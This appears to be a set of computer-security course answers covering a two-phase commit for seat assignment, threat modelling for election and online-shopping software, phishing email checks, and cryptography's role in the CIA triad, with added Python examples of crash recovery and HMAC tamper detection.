Use the two-phase update. Intent phase (nothing in the real database changes): 1. Check COMMIT-FLAG; if it is set, a previous update was interrupted in its commit phase, so finish that one first. 2. For each passenger, read the requested seat and verify it is currently free. 3. Write the intended assignments only to shadow (temporary) copies: set TNAME1-SEAT to the seat chosen for passenger 1 and TNAME2-SEAT to the seat for passenger 2. Every variable beginning with T is a shadow copy of the corresponding real field. 4. Check the shadow values against each other and against the database: TNAME1-SEAT must differ from TNAME2-SEAT, and neither may already be assigned to another passenger. If any check fails, discard the shadow copies and restart; the real data is untouched. Commit phase: 5. Set COMMIT-FLAG. 6. Copy the shadow values into the real fields: NAME1's seat field gets TNAME1-SEAT, NAME2's gets TNAME2-SEAT, and the seats are marked taken. 7. Write any related records (for example the manifest). 8. Unset COMMIT-FLAG. A failure during the intent phase loses nothing, because only shadow copies were written. A failure during the commit phase is detected at restart by the set flag, and the commit is simply redone from the shadow copies, which is safe because copying the same values again is harmless. Because the seat checks and the writes are performed as one unit and never interleaved with another passenger's update, two passengers cannot end up with the same seat.
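The procedure above as an added example that is not part of the original page or the textbook: a tiny in-memory model of the seat table with an intent phase that writes only shadow copies, a commit phase guarded by the flag, and a recovery step. The class and its seat names are constructed, and crash_after is a test hook added so that an interrupted commit can be demonstrated.

```python
# Added example: two-phase update for seat assignment with crash recovery.
class SeatAssignmentDB:
    """In-memory model of the seat table. Intent phase writes only shadow
    copies (the T... variables); commit phase copies them into the real
    fields under COMMIT-FLAG; recover() finishes or discards after a crash."""

    def __init__(self, seats):
        self.seat_of = {}            # real fields: passenger -> seat
        self.free_seats = set(seats)
        self.shadow_seat_of = {}     # TNAME-SEAT shadow copies
        self.commit_flag = False     # COMMIT-FLAG

    def intent_phase(self, requests):
        """requests: list of (passenger, seat). Validate, then write shadows only.
        Returns False, leaving the real data untouched, on any conflict."""
        if self.commit_flag:
            self.recover()           # finish an interrupted commit first
        shadow, wanted = {}, set()
        for passenger, seat in requests:
            if seat not in self.free_seats or seat in wanted:
                return False         # seat taken, or requested twice in this batch
            wanted.add(seat)
            shadow[passenger] = seat
        self.shadow_seat_of = shadow
        return True

    def commit_phase(self, crash_after=None):
        """Copy shadows into the real fields. crash_after (test hook) raises
        after that many real writes to simulate a failure mid-commit."""
        self.commit_flag = True
        for i, (passenger, seat) in enumerate(sorted(self.shadow_seat_of.items())):
            if crash_after is not None and i == crash_after:
                raise RuntimeError("simulated crash during commit")
            self.seat_of[passenger] = seat   # idempotent: safe to redo
            self.free_seats.discard(seat)
        self.shadow_seat_of = {}
        self.commit_flag = False

    def recover(self):
        """Run at restart. A set flag means the commit was interrupted: redo it
        from the shadows. A clear flag means only shadows were written: drop them."""
        if self.commit_flag:
            self.commit_phase()
        else:
            self.shadow_seat_of = {}

    def assign(self, requests):
        """The full update: intent phase, then commit phase, as one unit."""
        if not self.intent_phase(requests):
            return False
        self.commit_phase()
        return True


if __name__ == "__main__":
    db = SeatAssignmentDB(["12A", "12B"])
    print("double booking rejected:", not db.assign([("ann", "12A"), ("bob", "12A")]))
    print("valid batch accepted:   ", db.assign([("ann", "12A"), ("bob", "12B")]))
    print("seats:", db.seat_of)
```

The shadow copies are what make the abort free: until commit_phase starts, nothing the intent phase wrote is visible in seat_of, so a rejected batch leaves no half-assigned seat behind, and a crash after the flag is set is repaired by rerunning the same copies.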
Consider a program to accept and tabulate votes in an election. Who might want to attack the program? What types of harm might they want to cause? What kinds of vulnerabilities might they exploit to cause harm?
Who might want to attack the program?
-Foreign governments
-Terrorists and terrorist organizations
-Domestic political parties
-Activists
-Anarchists
-Bored people
What types of harm might they want to cause?
-Sway an election
-Destabilize the foundation of a political system
-Cause the country to lose global power and reputation
-Cause an economic spiral or meltdown
-Cause the people to revolt and protest
-Citizen deaths through rioting and civil unrest
What kinds of vulnerabilities might they exploit to cause harm?
-Take advantage of a weak background check, get hired as a programmer for the tabulation program and alter its code
-Break into the voting system over the network and alter stored totals
-Use open data on the voting trends of districts to target key areas and destroy the physical copies of votes there
Consider a program that allows consumers to order products from the web. Who might want to attack the program? What types of harm might they want to cause? What kinds of vulnerabilities might they exploit to cause harm?
Who might want to attack the program?
-Thieves
-Political enemies
-Romantic enemies (estranged spouses or ex-partners who were given, or stole, account information)
-Bored people
What types of harm might they want to cause?
-Steal customers' identities
-Use customers' accounts to order themselves goods at the victim's expense
-Hold accounts hostage and demand a ransom
What kinds of vulnerabilities might they exploit to cause harm?
-Call the web service's support line claiming to have forgotten their (that is, your) password
-Use a bot to rapidly try common passwords against your account
-Send you an email virus and obtain a spreadsheet of your passwords
-Gain control of your webcam and watch you type a password
You receive an email message that purports to come from your bank (Your Secure Bank). It asks you to click a link for some reasonable-sounding administrative purpose. How can you verify that the message did come from your bank?
Start with the address the message was sent from: an unexpected sender, or one whose domain does not match the bank's, is a sign of a malicious email, though the From header can be forged, so a matching address proves nothing by itself. Verify that the mailbox it was sent to is the one actually registered with the bank. Read the contents for glaring errors such as misspellings or unprofessional formatting, and for urgency or threats, which are typical of phishing. Hover over the link to see the real address; if it is not the bank's domain, do not click it. If there is any doubt, I would not use the link at all but go directly to my bank's website (typed or bookmarked) or call the number on my card and confirm whether the administrative task the email describes actually needs to be done.
Considering the CIA triad, describe the role that cryptography plays.
Cryptography supports all three members of the CIA triad, though not equally. Confidentiality: encrypting a message means a third party without the key sees only what looks like random bytes, so the data is meaningless to anyone not authorized to read it. Integrity: a hash function such as SHA-256 (MD5 and MD4 are hash functions, not encryption, and are obsolete) produces a fixed-length digest in which changing even one bit of the data yields a completely different value; a keyed version (a message authentication code) or a digital signature over the digest lets the receiver detect tampering, because the recomputed value will not match the expected one, and an attacker without the key cannot produce a matching one. Availability: cryptography does not directly provide availability and can even threaten it. Lost keys make encrypted data unrecoverable, and encryption adds computation that must not make a service too slow to use; it should be deployed so that the users who need the data can still get to it.
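The integrity point above as an added example that is not part of the original page: an HMAC-SHA256 tag appended to a message, with detection of a flipped bit and of a wrong key, next to a bare hash to show why a keyed construction is needed. The function names and the sample messages are constructed.

```python
# Added example: integrity protection with HMAC, contrasted with an unkeyed hash.
import hashlib
import hmac

TAG_LEN = 32  # SHA-256 output size


def protect(key: bytes, message: bytes) -> bytes:
    """Append an HMAC-SHA256 tag. The message stays readable (no confidentiality),
    but any change to message or tag is detectable by someone holding the key."""
    tag = hmac.new(key, message, hashlib.sha256).digest()
    return message + tag


def verify(key: bytes, blob: bytes):
    """Return the message if its tag checks out, else None."""
    if len(blob) < TAG_LEN:
        return None
    message, tag = blob[:-TAG_LEN], blob[-TAG_LEN:]
    expected = hmac.new(key, message, hashlib.sha256).digest()
    return message if hmac.compare_digest(expected, tag) else None


def flip_bit(data: bytes, bit_index: int) -> bytes:
    """Constructed tampering: flip a single bit of the data."""
    b = bytearray(data)
    b[bit_index // 8] ^= 1 << (bit_index % 8)
    return bytes(b)


def unkeyed_protect(message: bytes) -> bytes:
    """A bare hash appended to the message: detects accidental corruption only."""
    return message + hashlib.sha256(message).digest()


def unkeyed_verify(blob: bytes):
    message, digest = blob[:-TAG_LEN], blob[-TAG_LEN:]
    return message if hashlib.sha256(message).digest() == digest else None


if __name__ == "__main__":
    key = b"\x01" * 32  # constructed shared key
    blob = protect(key, b"transfer 10 to alice")
    print("intact:      ", verify(key, blob))
    print("one bit flip:", verify(key, flip_bit(blob, 3)))
    print("wrong key:   ", verify(b"\x02" * 32, blob))
    # An attacker who changes the message can recompute a bare hash, so the
    # unkeyed version offers no protection against deliberate tampering.
    forged = unkeyed_protect(b"transfer 1000 to mallory")
    print("unkeyed forgery accepted:", unkeyed_verify(forged) is not None)
```

A bit flip anywhere in the message or the tag makes verify() return None, and so does a tag computed under a different key; the unkeyed variant catches only the flip, since anyone can recompute a plain digest over a substituted message.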